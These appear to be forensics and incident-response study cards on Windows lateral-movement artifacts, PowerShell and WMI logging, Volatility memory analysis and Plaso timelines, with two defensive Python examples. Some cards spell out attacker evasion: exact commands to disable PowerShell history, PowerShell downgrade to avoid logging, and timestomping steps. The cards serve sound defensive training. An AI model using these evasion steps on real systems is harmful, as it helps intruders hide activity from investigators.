Gaps in the records
You need admin rights
Two native ways to conduct lateral movement in Windows environments
Map network share (net use)
RDP
3 physical places Places where we find filesystem artifacts for RDP connections
Jumplists (AppData\Roaming\MSFT\Windows\Recent\AutomaticDestinations) –> mstsc AppID shows all the Remote Desktop times/destinations
Prefetch files (on disk, not memory)
Bitmap cache (RDP puzzles!) cache##.bmc, cache###.bin in user directory, terminal server client/cache
What are we looking for in logs to see Remote Desktop SOURCE evidence, and what are the data sources?
Event logs, Registry, and file system
Looking for mstsc.exe (MSFT terminal server client) execution
The presence of what file in a user’s profile is a good indication that RDP has been executed on that system?
Default.rdp
Tool to parse the RDP registry, which is?
Regripper “rdphint”
RDP key found in
NTUSER\Software\MSFT\Terminal Server Client\Servers
What type of logon event is created on a system that’s been RDP’d TO?
4624, Logon Type 10
Will also produce a 4778/4779 event, with the ip source, system name, logon user name
Names of executables that will be presented on destination event logs for RDP
rdpclip.exe
tstheme.exe
User’s name directory will be created when….
any interactive login is conducted
Executables that will be visible forensically when windows admin shares are mapped, and where can we find them?
net.exe
net1.exe
Can be found in
event logs (Security, smbclient)
registry (mount points, shellbags, shimcache, bam/dam, amcache)
FileSystem (prefetch, user profile artifacts)
Key that shows the entire list of systems connected to by a user account
NTuser\Software\MSFT\Windows\CurrentVersion\Explorer\
MountPoints2
Why is 4672 presented on the destination for a connection to a remote admin share?
Because you need the privilege to be able to connect to an admin share, thus, 4672, privileged user breakdown
5 ways to execute malware on a host, using lateral movement techniques
PsExec, Windows Remote Management tools, PowerShell/WMIC, exploiting a vuln, application deployment software
Popular malware like Conficker, Shamoon, WannaCry, NotPetya, etc. look for what to be able to propagate?
Windows admin shares
Key artifact for PsExec usage in registry
The Sysinternals\PsExec\EulaAccepted key (NTUser.dat)
Any changes in the delta of what should raise eyebrows for legit users of PsExec (or for malicious use, really)
Any increase in the amount of EULAs accepted, which should always remain relatively static. (Same amount of users)
PSEXESVC.exe is an artifact for what?
Being on the receiving end (destination) of a psexec connection.
receiving commands from WMI will produce what .exe?
What other files will be presented?
wmiprvse.exe
scrcons.exe
mofcomp.exe
manipulation of WMI repo will show up where?
System32\wbem\repository
Good executable indicator of PowerShell remoting?
wsmprovhost.exe
Full script logging for PS is available in:
PS 5 and beyond
Common tools for using application deployment software to deploy lateral movement software/malware
GPO, SCCM, Cloud control panels.
What does process tracking give you?
A running record of processes that were executed, and who the parent process was - includes full command lines of processes (both cmd and Powershell.exe)
Problem with process tracking
HUGE amount of data, same as what’s in prefetch
What system baseline is the first to integrate process tracking?
Win 7
Where does process tracking add content to?
Windows event logs: adds process information section
How do you see command line code in logs?
turn on process tracking, with CLI auditing. Will include the full script that was executed
How can you hide command line scripts even if process tracking/cli auditing is fully turned on?
Have the malicious script call script blocks, and have the necessary evil in a file in temp or wherever
Turn on what for power-shell specific logs?
Powershell script block logging, Powershell remoting logging
How can red teams get around PS logging?
downgrade Powershell to pre-PS5, where it was introduced. Downgrade attacks are very popular!
What is tracked in Windows-WinRM/Operational log?
WinRM connections, which is the primary protocol for Powershell Remoting
Records all commands typed and the output of those commands, for powershell
the transcript log. Records to the users documents folder by default. Only records input/output to the PS terminal
Tools meant to run on Powershell logs to detect obfuscation/encoding
Invoke-Obfuscation tool and Revoke-Obfuscation tool
A way to see a PowerShell “bash history”
PS saves its history in PSReadline ConsoleHost_history.txt
Stored at
%AppData%\Roaming\MSFT\Windows\PowerShell\PSReadline
Records last 4096 commands typed in PS console
What can bad guys do to keep you from seeing the PS “bash” (Command line history)
Set it to disabled in PS, or just remove the PsReadline Module
Do it by Set-PSReadlineOption -HistorySaveStyle SaveNothing
Remove-Module -Name PSReadline
Best place to discovery evil WMI eventing
WMI-Activity log; look for EID 5861, new permanent consumers.
You must be able to “whitelist” typical WMI activity in the environment
Problem with WMI activity log for finding WMI evil?
It doesn’t track processes or command lines, without that being turned on, and then it is tracked in security logs
What is AMSI?
Anti-Malware Scanning Engine; something that antivirus vendors can hook into for visibility. Windows 10+
Most modern way to export evt logs (4)
Zimmerman’s event log extraction tool
evt log explorer (command line version)
evtwalk/evtxtract carving tool
with Powershell, grab it remotely or locally: Get-WinEvent
Free blue team logging aggregation/forensic tool, from MSFT?
Sysmon! Easy configuration, filtering
requires a LOT of tuning.
What does Mofcomp do?
Can be used to create a WMI event for persistence (Creates WMI filters)
Great free database to break down/describe specific Windows event logs and their context
Ultimate Windows Security
EventID a good second option.
Ways to obfuscate Powershell script blocks can be found in
Invoke-Obfuscation and Revoke-Obfuscation
Open Sourced PowerShell script for deobfuscating other encoded PowerShell scripts
PSDecode
Option in cyberchef to decode strange/obfuscated portions
The “magic” option, which will try to do a first few passes on scripts to see what they’re supposed to be used for/attempting to accomplish.
Challenges with saving Powershell logs
The transcript logs are trivial to manipulate on a box (unencrypted in the users documents folder)
Powershell remoting limits the sharing of the logs over the network due to problems w/network authentication “double hopping”
Best to have it set as an automated forwarding (UF, filebeat, etc)
Powershell logs “bash history” get saved as….
…and what’s the downside?
PSReadline Console Host history. Stored in each user’s profile
No process tracking or script output
Evil in WMI logs can be found in
Look for New WMI Event Consumer Creation
Ways to look in WMI logs for evil
Look for evil DLL extending WMI capabilities
Look for uncommon words, software terms (Eval, activexobject, .vbs or .ps1 scripts, etc)
Exporting logs is challenging because…
Exporting tools will often partially corrupt log files
stored in binary form, so they need to be converted
Where does Sysmon store logs?
Creates a new log output dir, Windows-Sysmon/Operational
EDR that lets you connect to a remote host and attach a remote disk as local. Works directly with Linux. (Can attach a remote disk to a SIFT image)
F-Response
Kape is __________ program that does what?
Triage program: Collects files, and processes the files across its program set. Fast, flexible, collects locked system files/shadow copies.
What are Kape “Targets”
the list of files for it to collect
Advanced capabilities of EDR to perform memory analysis leads to good visibility for
CLI artifacts, network activity, process tracking/tracing, DLL injection, rootkit insertion
Why is EDR’s access to memory critical?
Because much of the modern attack ecology is memory resident
Why is memory key to finding running processes?
You can hide executables on disk, obfuscated, but you can’t hide them from the processor. They have to be uncloaked to
As a cheat, in memory, you can collect executables from memory. How? (Rob Lee’s trick)
Dump all the executables, drivers, dll’s from memory analysis, and run antivirus/clamav at it.
Cant hide the raw in memory!
Best place to find malicious software activity
Memory samples; stuff injected into processes, or obfuscated, will be easier to find in memory. (Harder on live host)
Why is memory collection/analysis hard to do? (why is it brittle)
It’s tied to specific profiles and variations of operating systems.
Options for acquiring memory from running (live) systems
F-Response (and SIFT), WinPmem (Velociraptor), DumpIt (CLI from USB), Belkasoft, Magnet Forensics
Options for acquiring memory from dead box?
Hibernate file (hiberfil.sys)
Swapfile.sys
Pagefile.sys
Windows Memory Dump (%WINDIR%\Memory.dmp)
Difference between memory collection on a Hyper-V image and a VMware/Parallels image
On VMware, you can just grab the .vmem file
On Hyper-V, you have to attach a process (like Winpmem or F-response) and pull memory like you would any other running system
What is a hibernation file on windows?
A fully compressed copy of memory (RAM) at the moment of hibernation.
Some tools can uncompress it. (Volatility) Some can just process it natively.
Difference between a PC sleeping and hibernating?
Hibernating isn’t a normal thing:
only occurs from loss of power/power about to drain out of device
or for shutdown/fastboot.
When installing new files/programs (recovery functions)
Why does Windows 10 being on a regular update schedule make memory forensics harder?
Every new major update changes its memory profile, for tools, making them less effective.
Things like artifact formats (prefetch, shim cache) change!
Also, hibernation file formats and use changes. (It’s not used as frequently any more)
What is Virtual Secure Mode, and why does it affect memory acquisition?
Windows 10 feature. It protects the kernel and user mode components, which often block the insertion of the driver necessary to do the memory acquisition
Problems with Windows 10 memory file acquisition using Hibernation files?
Data is zeroed after return from hibernation
Hibernate files only keep smaller (and less interesting) files for Hibernate, HybridSleep. (40% of total memory space) BUT they’re kept more often! Stored in case of power loss.
Fast Startup mode only holds for reboots, about 20% of memory.
Where are hibernate files backed up to?
Trick question! Nowhere. It’s not backed up in VSS.
Core components of what we find in RAM
Kernel Processor Control Region (KPCR)
Kernel Debugger Data Block (KDBG)
Directory Table Base (DTB)
Can create volatility environment variables for what?
Things like image location, with a file path, or a specific O/S profile (Win10, update 6, etc)
How to:
Recover metadata from a memory image
- Determine the OS and service pack/update (profile info)
- Find date and time when memory was acquired
Volatility plugin: imageinfo
what is volatility’s --profile for?
telling it what O/S and build number/service pack the memory sample is from
Alternative to imageinfo plugin to find the O/S of a memory image w/Volatility
kdbgscan plugin
Signs you picked the wrong volatility profile
pslist, psscan, filescan, and hivelist don’t return sane results, or return gibberish
Uncompresses and converts hibernation files and crash dump files, as well as snapshots/VBox memory, to raw memory images in Volatility
imagecopy plugin
During step 1 of memory analysis, which is…… we start with looking at these process blocks
EPROCESS blocks, which show the file links (forward and backward) to parent and child processes
Items to look for when analyzing processes
Name - Spelled correctly, legit process
Path - Running from correct dir
Parent process - what you’d expect
command line - arguments and switches make sense
Start time: was it started at boot, near attack?
SID - do the SIDs make sense? Are system/user account SIDs launching correct processes?
Specific plugins for finding rogue processes in volatility
malprocfind - automatically identify suspicious system processes
processbl - compare processes and loaded DLLs with a baseline (a known good image for comparison)
Good way to compare processes w/volatility to a known good image
processbl ; run against a baseline image
How to identify processes that are hidden or no longer running in volatility? Why would things appear here?
Use the psscan plugin
Rootkit detection
may have crashed or not cleanly exited
Useful plugin for identifying processes spawned by the wrong parent in volatility
pstree
Useful way to identify webshell commands using volatility
Use PStree: see commands being sent by the parent web process.
Limitation of the malprocfind volatility plugin
It only looks at common system processes: items like csrss, winlogon, services, lsass, etc.
Three plugins used to baseline in Volatility
processbl
servicebl
driverbl
Can be run to tell you what the “diff” between the image is, or, what matches. (The latter can be useful for showing the same driver, but with different paths, etc)
Conducting research into what DLLs, registry key access, network sockets, and memory areas used by processes is found in its
Windows Process Objects
Handles within process objects contain what info?
Pointers to a resource
Directories and Registry keys accessed by a process
Mutex/Semaphores (access to objects)
Events
Seeing a processes memory areas used can be found in…
memory sections of a process object (volatility)
Getting directories and registry key access, events, and object access from a process is found with what plugin for volatility?
handles (Prints the list of open handles)
Prints the loaded dlls for each process in volatility
dlllist
Scan memory for windows service information in volatility
svcscan
How to see the command line associated with a running process?
in volatility, use dlllist to display the loaded DLLs and command lines
How to extract a specific DLL for analysis with volatility
use dlllist to identify a specific DLL (and its base offset) and then use dlldump to extract it.
Why do we want to look at the access tokens for a process? How?
Give us the running user of the process, and the relative authority given to the overall process.
use getsids plugin to see token info, which shows you the account Sid AND the group info
How to find process SIDS, which would show you system processes running with a user context?
getsids
LocalSystem SID
S-1-5-18
NetworkService SID
S-1-5-20
Administrator group SID
S-1-5-32-544
User group/guest SID
S-1-5-32-545
Guests:
S-1-5-32-546
Handles in a process is all of the…..
Nouns.
Files, Objects, Keys, etc.
Limits to looking at process handles in volatility, and a way to navigate it
there’s hundreds or thousands per process
-t (or grepping the output) can limit it to File or Registry Keys for quick wins
What is a mutex/mutant?
Type of process structure: it’s a governor.
Processes will use it often as a flag so that if you run a second copy of the process, it won’t launch. (Won’t need to instantiate another version of it) Malware uses it to prevent multiple infections/DoS’ing yourself.
Make great IoC!
Well known malware will ________to say, regardless of version, that a copy of the malware was installed and running.
use a mutex flag
Carbon Black and Falcon, etc will look for these. When intel produces it as an IoC for malware, can load it as a yara signature
When Threat Intel/Malware analysis produces a mutex, what can be done with it?
Make a yara signature and sweep for that flag, as it’s usually a solid IoC that the malware was installed on the host
Some things to look for with the svcscan plugin for Volatility
Scan for service records, with associated info on processes and drivers.
Can look for windows services that are used as a persistence mechanism: Auto starts, etc. Can also find services that malware stopped. (Like antivirus services being stopped)
the verbose option will identify the DLLs used by services.
Some things to look for in network sockets established by processes?
Things that aren’t web browsers that are connecting on 80,443,8080
Eliminate product updates.
Focus especially on anything RDP or DNS to unusual names
Where would you see internet explorer using weird protocol ports? (in memory)
Look at the network sockets a process has opened; look for iexplore/edge opening sockets to a weird port
Whats “poker hands” as they relate to network sockets
Look for 4444 or 5555, or straights (4567) because those tend to mean something/suspicious
RPC connections between workstations is weird, because
workstations don’t fully establish RPC connections to communicate natively in AD environments!
What is a service opening a connection to itself (127.0.0.1:random to 127.0.0.1:3389)
Evidence of port redirection. (Netcat shoveling, etc)
Plugin for volatility to give you connections and sockets (versus just list of tcp connections)
netscan
What types of connections are returned from volatility’s netscan plugin
both active and terminated connections - pay attention to the process.
First thing that should flag in your mind when you find evidence of code injection
Something, on the system, that is causing the code injection. (Aircraft carrier during Pearl Harbor analogy; for planes to get there, they had to have been carried somewhere. Must be an aircraft carrier somewhere)
Spearphish code; initial access.
Why use code injection?
Camouflages code, access memory/permissions of target system, process migration, evade A/V and allowlisting, facilitates complex attacks (rootkit)
Simple code injection techniques are ____ to find for manual memory analysis, versus more complex techniques, which are ______ to find.
Simple code injection: easy for A/V, EDR; hard for manual
Complex code injection: harder for A/V/EDR find, much easier to find manually
Three very common types of code injection, and how they work
Simple code injection: Writing into existing DLLs or code
Reflective DLL injection: Loading code independent of host processes. (For example, meterpreter uses its own loader) Powershell can do this, too.
Process hollowing: starts a suspended service, carves out a section for new code, and then starts the service. Much of the code (like DLLs, handles, etc.) is from the original process, making it harder to see.
Loaded a service in the suspended state, carving out some space for new Code, and then launching it is an example of
Process Hollowing
VirtualAllocEx() and CreateRemoteThread() and SetWindowsHookEx() are techniques found in what, and what do they do?
Simple Code injection (DLL injection)
They create space in the DLL, on disk, and write in new code.
When does the injected DLL usually get caught, by signature based methods?
When it gets loaded from the volume it lives on into memory, and is checked.
Why are reflective techniques easier for manual review, but harder for automated techniques?
It’s easy to see DLLs that aren’t loaded from file, or not loaded from a standard location. DLLs loaded in an unusual way are glaring beacons of weirdness.
For example, DLLs loaded down from memory don’t have a source file on disk!
Two popular plugins for finding DLL injection
ldrmodules
Malfind
What does ldrmodules do in Volatility?
Detect unlinked DLLs and non-memory mapped files
Checks the “DLL manifest” of the PEB (Process Execution Block) and finds DLLs that were removed from the manifest, or unlinked.
Look for DLLs with no “MappedPath” info
what does malfind do in Volatility?
Finds hidden and injected code, and will dump affected memory sections
What is a lack of a “mapped path” or a weird path for a DLL in the PEB indicate?
That it was not loaded using the Windows API, or loaded in some unusual way. (Often indicative of a DLL injection attack)
What’s special about executable code in the ldrmodules plugin of Volatility?
They will flag as “false” for InInit, because they’re executable.
Stuxnet uses what type of code injection? Why is this easier for manual review?
Process injection
Can find duplicate examples of dlls that should only have 1 version of it, which is glaring
In memory, the lack of a mapped path from where the DLL was loaded combined with it not being on the PEB (manifest) is a red alarm light
What does the “Base” section of a ldrmodules volatility plugin output?
the memory section it’s present in. (Will be mapped to the Process Execution Block, PEB, for legit DLLs)
What is reflective code injection? Who uses it?
Getting arbitrary code running inside a process without using the Windows LoadLibrary path.
The payload maps itself into memory, so no file is opened and no loader entry is created.
Metasploit, Cobalt Strike, Pulsar, etc
Easiest way to detect reflective code injection?
Manual memory analysis! Most security tools watch the Windows loader API, so a technique that never touches it is hard for them to see, but it is glaring in manual memory review. (malfind)
Malfind (Volatility) walks ______ to perform its checks.
The VAD tree of every process, looking for regions with PAGE_EXECUTE_READWRITE protection that have no mapped file behind them.
Anything executable and writable with no file on disk backing it is reported, with a hex and disassembly preview of the first bytes.
Malfind is good for finding
reflective and other memory-only code injection techniques
Like the executable bit on a file system, but for memory pages: the protection recorded in the VAD tells you what is allowed to run.
The VAD tree entries (protection and MappedPath) are what malfind inspects.
What volatility plugin dumps extracted files it deems potentially malicious, and how?
Malfind: –dump-dir=
When malfind dumps executable regions, what is the first thing you check to see if the dumped files are code?
The “MZ” header is usually indicative of a PE file.
MZ is indeed the characteristic signature of a .exe file:
The DOS MZ executable format is the executable file format used for .EXE files in DOS.
The file can be identified by the ASCII string “MZ” (hexadecimal: 4D 5A) at the beginning of the file (the “magic number”). “MZ” are the initials of Mark Zbikowski, one of leading developers of MS-DOS.
How does modern malware try to hide from the malfind preview?
Malfind only shows a preview of the first 64 bytes; the region can start with nonsense, then jump to the real code later.
Or the reflective loader erases or overwrites the PE header after mapping, so the first two bytes are not the standard MZ header even though the code is still there. Advanced stuff.
Peanut Butter and Jelly as a code example
Take a piece of bread
PB on bread
Jelly on PB
Take a piece of bread and put it on the jelly
Code, like a recipe, has a recognizable sequence: function prologues in assembly repeat the same few instructions (push ebp; mov ebp, esp, or the x64 equivalents), so the disassembly preview reveals code even when the MZ header is gone.
How to get around malfind counter-measures?
Use the –dump-dir option, which writes the entire region to disk rather than just the 64-byte preview.
Then scan the dumped files with AV or YARA (yarascan can also run YARA rules over the memory image directly).
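The malfind logic described in the cards above, as an added example (not code from the page or from Volatility): it walks a constructed list of VAD regions, keeps only private PAGE_EXECUTE_READWRITE regions with no mapped file, and then looks past the 64-byte preview for a validated PE header or a function prologue, which is exactly what defeats the two evasions just described (displaced header, erased MZ). The region layout, protection constants and sample bytes are constructed for the example; real VAD walking needs the memory image and Volatility.

```python
import struct

PAGE_EXECUTE_READWRITE = 0x40          # VAD protection value malfind keys on
# Bytes of common function prologues: x86 "push ebp; mov ebp,esp",
# x64 "mov [rsp+8],rbx" and "sub rsp,imm8"
PROLOGUES = (b"\x55\x8b\xec", b"\x48\x89\x5c\x24", b"\x48\x83\xec")

def find_pe(data):
    """Offset of a validated PE image anywhere in data, or -1.

    Every 'MZ' candidate is checked, not just offset 0, and the e_lfanew
    pointer must land on a 'PE\\0\\0' signature inside the buffer."""
    off = data.find(b"MZ")
    while off != -1:
        if off + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
            sig = off + e_lfanew
            if data[sig:sig + 4] == b"PE\x00\x00":
                return off
        off = data.find(b"MZ", off + 1)
    return -1

def find_prologue(data):
    """Offset of the first recognisable function prologue, or -1."""
    hits = [h for h in (data.find(p) for p in PROLOGUES) if h != -1]
    return min(hits) if hits else -1

def malfind(vads):
    """Walk a process's VAD list the way malfind does.

    Only private (no mapped file) regions with PAGE_EXECUTE_READWRITE are
    candidates; each is classified by what its bytes contain.
    Returns a list of (region_start, verdict, offset_of_evidence)."""
    findings = []
    for v in vads:
        if v["protection"] != PAGE_EXECUTE_READWRITE or v["mapped_path"]:
            continue                      # file-backed or not RWX: skipped
        pe = find_pe(v["data"])
        if pe != -1:
            findings.append((v["start"], "pe_image", pe))
            continue
        pro = find_prologue(v["data"])
        verdict = "code_prologue" if pro != -1 else "rwx_no_file"
        findings.append((v["start"], verdict, pro if pro != -1 else None))
    return findings

def make_pe_blob(prefix=b""):
    """Constructed minimal PE: MZ header, e_lfanew = 0x40, 'PE\\0\\0' at 0x40."""
    hdr = bytearray(0x44)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\x00\x00"
    return prefix + bytes(hdr)

# Constructed VAD regions (start, protection, mapped file, first bytes):
SAMPLE_VADS = [
    {"start": 0x7FF00000, "protection": 0x20, "mapped_path": r"C:\Windows\System32\ntdll.dll",
     "data": make_pe_blob()},                          # legit, file-backed: ignored
    {"start": 0x02A10000, "protection": PAGE_EXECUTE_READWRITE, "mapped_path": None,
     "data": make_pe_blob()},                          # reflective load, MZ at offset 0
    {"start": 0x03B20000, "protection": PAGE_EXECUTE_READWRITE, "mapped_path": None,
     "data": make_pe_blob(prefix=b"\x90" * 80)},       # header pushed past the 64-byte preview
    {"start": 0x04C30000, "protection": PAGE_EXECUTE_READWRITE, "mapped_path": None,
     "data": b"\x00" * 96 + b"\x55\x8b\xec\x83\xec\x10"},  # MZ erased, prologue remains
    {"start": 0x05D40000, "protection": 0x04, "mapped_path": None,
     "data": b"\x00" * 64},                            # PAGE_READWRITE heap: ignored
]

def preview(region, n=64):
    """What malfind prints by default: only the first n bytes of the region."""
    return region["data"][:n]

if __name__ == "__main__":
    for start, verdict, off in malfind(SAMPLE_VADS):
        print(f"0x{start:08x} {verdict:14s} evidence at offset {off}")
```

The third region is the evasion case: its 64-byte preview contains no MZ at all, and only a scan of the whole dumped region (the –dump-dir workflow) finds the header at offset 80. A bare “MZ” with no PE signature behind it is deliberately not accepted, which keeps random strings in heap memory from being reported as images.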
Two plugins for detecting process hollowing in Volatility
Hollowfind and threadmap
Volatility looks for rootkits (kernel hooking and hiding) with which plugins?
modscan: finds kernel modules via pool tag scanning
apihooks: finds DLL function hooks
psxview: finds hidden processes via cross-view techniques
ssdt: displays System Service Descriptor Table entries
Requirement for kernel rootkit hooking on modern Windows
The driver has to run in ring 0, which on 64-bit Windows means signed code (or a bypass of driver signature enforcement)
Displays hooked functions in the System Service Descriptor Table (Windows kernel hooking, a rootkit technique)
ssdt plugin of Volatility
Key first step to finding rootkits in the SSDT, and eliminating “known goods”
Filter out entries that point into ntoskrnl.exe and win32k.sys, which are the normal owners of SSDT functions; anything pointing elsewhere deserves a look.
DKOM (Direct Kernel Object Manipulation) is a technique to….
Hide processes (and rootkits) by unlinking their EPROCESS entry from the ActiveProcessLinks doubly linked list (forward link, backward link), so a list walk no longer sees them.
Finding DKOM (process hiding) is checked with
psxview: cross-view. Compares the linked-list walk (pslist) with pool-tag scanning (psscan) and other sources such as threads, the PspCid table, csrss handles and sessions; a process absent from the list but found by the scan is hidden.
Scans the memory image to find loaded, unloaded, and unlinked kernel modules (drivers)
modscan (pool tag scan) / modules (linked list) plugins of Volatility
Diffs drivers vs. known good drivers
driverbl plugin for Volatility (baseline plugins); like servicebl and processbl, it lets you compare the image against a known good baseline image
Can be used to intercept calls to notepad, the microphone, the font renderer, and others in order to “spy” on things discreetly.
How would you see these calls?
They go through the Windows API, which can be “hooked”
Find these hooks with the apihooks plugin of Volatility
These hide the existence of system objects like processes, files, reg keys, and network artifacts
Rootkits
idt and driverirp are used for
identifying Interrupt Descriptor Table hooks and hooked driver IRP (I/O request packet) handlers: kernel-level hooking that apihooks does not cover
Best way to extract processes, drivers, and objects
dlldump moddump procdump memdump cmdscan dumpfiles filescan
how to scan memory samples for file objects (docs, pdfs, etc)
filescan
how to extract files (docs, pdfs, etc) from memory by name or physical offset
dumpfiles
Can extract kernel drivers from a memory sample
moddump
Plugins to dump out memory for specific processes; for example, get the chat history from a Skype process, or command line history (from conhost)
memdump (all pages owned by the process into one file) or vaddump (each VAD region to its own file)
What can we do with a memdump sample, from the volatility plugin?
can do strings/unicode extraction; can pull useful commands out of the sample (using grep on the extracted filename)
How to extract the console output/command history from memory?
Use the cmdscan and consoles plugins, then run strings/grep against that output. (They recover the COMMAND_HISTORY and CONSOLE_INFORMATION structures left behind by conhost)
Memory analysis tools other than Volatility (live systems)
Rekall, and GRR/Velociraptor (free, open-source endpoint tools that can acquire and query live memory)
Scans memory (the whole image or a single process) with YARA rules, so indicators built from one dump can be swept across another
yarascan
Tool for extracting ascii and unicode strings from memory dump files
bstrings - handles regex, too
Three main pieces of a super timeline
File system metadata (MFT timestamps)
Windows artifact data (event logs, prefetch, LNK, jump lists, etc.)
Registry keys (last-write times)
What is a “pivot point” in timeline analysis?
An event, malicious or otherwise, in which you can see a group of threat actor activity just by “temporal” analysis
Tool for extracting only the file system metadata from a system
fls (Sleuth Kit) or MFTECmd
Tool for creating a super timeline, creating the standard file system metadata extract as well as extra enrichment data
Plaso (log2timeline)
Contains filesystem artifacts, artifact timestamps, registry timestamps, and works on all O/S variants
Four timestamps for an NTFS file
m - data content change time (modified)
a - data last access time (accessed)
c - metadata change time ($MFT record changed)
b - file creation time (born)
What is a “MACTime” column in a timeline for?
The specific timestamp that was modified:
Modified
Accessed
Changed
Birthed (created)
Tool that lists the files (allocated and deleted) in a forensic image as if it were a normal file system, without mounting it
fls (Sleuth Kit)
What is a body file?
The intermediate pipe-delimited format (one line per file with inode, mode, size and the four timestamps) produced by fls or MFTECmd; mactime turns it into the timeline, and bodies from several images can be combined into one.
3 main types of data collected from filesystems
- Allocated files (Normal files)
- Deleted files (Files deleted normally, but still have structures; file path name, permissions, timestamps)
- Unallocated inodes (Orphan files, with no directory structure)
Sort the data from a filesystem collection tool (body file) into a usable segment to analyze with…
Mactime tool (perl script)
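The body-file-to-timeline step above, as an added example (not the mactime perl script itself): it parses constructed body-file lines in the Sleuth Kit 3.x layout that fls and MFTECmd emit, expands each file into one row per distinct timestamp with the MACB column, sorts them, and date-bounds the result the way psort does later in the workflow. The three input lines are constructed for the example.

```python
from datetime import datetime, timezone

# Constructed body-file lines in the Sleuth Kit 3.x format that fls and
# MFTECmd --body emit (timestamps are epoch seconds):
# MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime
SAMPLE_BODY = """\
0|C:/Windows/System32/svchost.exe|1532-128-1|r/rrwxrwxrwx|0|0|51712|1554500000|1431700000|1431700000|1431700000
0|C:/Users/bob/AppData/Local/Temp/payload.exe|88931-128-3|r/rrwxrwxrwx|0|0|40960|1554503600|1554503600|1554503600|1554503600
0|C:/Users/bob/AppData/Local/Temp/payload.exe ($FILE_NAME)|88931-48-2|r/rrwxrwxrwx|0|0|40960|1554503610|1554503610|1554503610|1554503610
"""

def parse_body(text):
    """One dict per body-file line; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        f = line.split("|")
        if len(f) != 11:
            continue
        rows.append({"name": f[1], "inode": f[2], "size": int(f[6]),
                     "a": int(f[7]), "m": int(f[8]), "c": int(f[9]), "b": int(f[10])})
    return rows

def mactime(rows):
    """Expand each file into one timeline row per distinct timestamp.

    The MACB column marks which of the four times equal that instant
    ('m.cb' = modified, MFT-changed and born at once; '.a..' = only accessed).
    Rows are sorted by time, then name, like the mactime perl script does."""
    events = []
    for r in rows:
        for ts in sorted({r["m"], r["a"], r["c"], r["b"]}):
            macb = "".join(k if r[k] == ts else "." for k in "macb")
            events.append((ts, macb, r["size"], r["inode"], r["name"]))
    events.sort(key=lambda e: (e[0], e[4]))
    return events

def between(events, start, end):
    """psort-style date bounding: keep events with start <= ts < end."""
    return [e for e in events if start <= e[0] < end]

def render(events):
    """CSV rows with a human-readable UTC time, the mactime output layout."""
    fmt = lambda ts: datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    return [f"{fmt(ts)},{macb},{size},{inode},{name}" for ts, macb, size, inode, name in events]

if __name__ == "__main__":
    print("\n".join(render(mactime(parse_body(SAMPLE_BODY)))))
```

Reading the output: svchost.exe splits into an old "m.cb" row (install) and a recent ".a.." row (last read), which is the normal shape for a system binary. payload.exe has all four times equal ("macb") and its $FILE_NAME entry is ten seconds later, the pattern the timestomping cards further down describe.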
Steps for timestomping
Set the $STANDARD_INFORMATION timestamps with a tool
Copy the file to another folder (a new $FILE_NAME attribute is created, carrying the real current time)
Set the $STANDARD_INFORMATION timestamps again (some of them change during the copy)
What is timestomping?
Manually setting timestamps (with a utility, or via file copy operations) to hide when something was actually done
3 parts of log2timeline (Plaso)
log2timeline.py: the extractor, which writes events into a Plaso storage file
pinfo.py: displays storage file metadata
psort.py: sorts, filters and outputs the events
What does Plaso do?
Runs log2timeline, but pulls relevant forensic data from ALL the places:
LNK, jump lists, web history from all browsers, registry (shellbags, mount points, services, autoruns, terminal server, task scheduler, etc.), prefetch, shimcache, Windows firewall logs and many more
What types of web artifacts does Plaso pull out?
Everything: cache, cookies, history, etc., from all browsers
How to import additional file system details into Plaso
mactime parser
Things log2timeline can look at
Mount point, image file, KAPE output directory, partition, etc.
How does Plaso handle volume shadow copies?
When it detects, it will ask if it wants to extract them in the timeline.
Have to be careful, it slows down analysis a lot.
Ways to streamline log2timeline
Can use a filter file, or just use specific parsers (just MFT, or just specific registry key, or trigger if it finds certain things)
How does log2timeline filter?
Filter files use regex-style paths: a pipe for OR, and .+ matches any intermediate directory. Lets you set wildcards and conditions for directories.
EX: /(Users|Documents and Settings)/.+/NTUSER.DAT
SANS provided filter file for log2timeline…
Covers 99% of the standard extraction use cases, and parallels the conditions in the KAPE targets. Looks for specific artifacts: memory-related files, registry hives, LNK, jump lists, prefetch, specific event logs, the $MFT, etc.
How would you let Plaso know that you want to skip collecting something specific, like winevt logs, the recycle bin, or Chrome cookies?
In the –parsers command line switch, prefix the parser name with !
log2timeline.py –parsers “win7,!winevt” –storage-file timeline.plaso /mnt/image
Tools for sorting a super timeline generated by Plaso
pinfo.py and psort.py
Pinfo.py does what?
Takes a plaso dump and tells you what’s in it, and how big it is.
Shows you what parsers have been run and what’s inside each file, how many events
What are lnk files?
Shortcut files.
What does psort.py do?
Sorts the events in a Plaso storage file. Can use it to “date bound” the results with a filter. Can also change the output type (CSV vs. XLSX, etc.)
Can also convert the timestamps into a specific timezone, i.e. EST/PST
Steps for creating a sample super timeline
Mount the remote system drive
Extract with log2timeline.py (with parsers we care about)
Filter the timeline w/psort to the range of time you’re interested in.
Steps for creating a sample super timeline for a phishing attack
Mount the remote disk w/F-Response
Create a timeline w/ the standard Windows filters, with log2timeline
Gather the file system data with MFTECmd.exe and create a body file
Parse the body file with the mactime parser (log2timeline)
Sort the data for the date range you’re interested in
How does SANS recommend coloring the super timeline?
Red: evidence of execution
Gray: event logs of interest
Yellow: web history
Blue: USB usage
Black: deleted items
Light green: file opening
Dark green: folder opening
What does MACB stand for?
Modified, accessed, (MFT record) changed, birthed.
5 anti-forensic techniques for file system hiding
Timestomping
File deletion
Free space wiping
Data encryption (.rar)
Fileless malware
Manipulating registry keys or deleting them, or hiding scripts in the registry, are examples of
Registry anti-forensics techniques
How long will a deleted file hang around, on average, once it’s deleted?
SSDs and disks clean up via optimization or drive “trimming”, which releases unallocated storage areas and zeroes out deleted files. Runs around weekly, or sooner depending on activity.
Expect 72 hrs.
Best place to find deleted or wiped files
Outside of 72 hrs, residue will likely exist in the volume shadow copies, if at all
Very common anti-forensics/hiding technique for Powershell scripts
Registry key, as a download cradle type abbreviated script
Why is the registry a poor place to hide PowerShell scripts?
It’s a database that acts like a mini file system: deleting a key or value only marks its cell as unallocated inside the hive, and the data sits there until the space is reused, which can be indefinitely. It leaves lasting forensic residue.
